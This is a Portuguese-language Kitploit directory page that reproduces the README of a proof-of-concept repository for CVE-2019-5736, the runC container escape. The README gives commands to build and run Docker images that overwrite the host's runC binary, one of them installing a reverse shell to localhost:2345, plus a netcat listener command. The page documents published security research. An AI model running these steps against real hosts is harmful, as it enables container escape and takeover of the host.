Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
POC-CVE-2019-5736 — Exploits de prova de conceito para CVE-2019-5736, uma vulnerabilidade de escape de contêiner runC, demonstrando fuga de contêiner via imagens maliciosas e comandos exec. | Kitploit
Ferramentas/GitHubGitHub/bbrathnayaka/poc-cve-2019-5736
Segurança de ContêineresGeração de PayloadsAnálise de VulnerabilidadesExploraçãoRed TeamingEscape de Contêiner
GitHubbbrathnayaka/poc-cve-2019-5736

POC-CVE-2019-5736

Exploits de prova de conceito para CVE-2019-5736, uma vulnerabilidade de escape de contêiner runC, demonstrando fuga de contêiner via imagens maliciosas e comandos exec.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
14há 6 anosAinda não revisado

RunC-CVE-2019-5736

Build Status Build Status Build Status Build Status Build Status


Vídeo: https://bit.ly/2WqvILb

Post no Blog: [www.idealhax.blogspot.com/2020/05/breaking-out-of-docker-via-runc.html]

Aqui, gostaria de mencionar que o desenvolvedor original deste exploit é Yuval Avrahami, da Twistlock Labs.

Executando os POCs

Note que executar os POCs substituirá o binário runC no host.

É altamente recomendável que você crie uma cópia do seu binário runC (normalmente em /usr/sbin/runc) antes de executar um dos POCs.

Clone o repositório:

root@kitploit:~
$ git clone [email protected]:BBRathnayaka/RunC-CVE-2019-5736.git

Exec POC

Substitui runc por um programa simples que imprime uma string.

Executando o exec POC:

root@kitploit:~
$ docker build -t cve-2019-5736:exec_POC ./RunC-CVE-2019-5736/exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash

POC de Imagem Maliciosa

Substitui runc por um script bash de reverse shell simples que se conecta a localhost:2345.

Escute pelo reverse shell:

root@kitploit:~
$ nc -nvlp 2345

De um shell diferente, execute a POC de imagem maliciosa:

root@kitploit:~
$ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC

Referência

root@kitploit:~
Veja o [Twistlock Labs](https://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/ "Explicando o CVE-2019-5736") para uma explicação do CVE-2019-5736 e dos POCs.

A POC de imagem maliciosa é fortemente baseada na [POC do q3k](https://github.com/q3k/cve-2019-5736-poc), então todo o crédito vai para ele.
Baixar ferramenta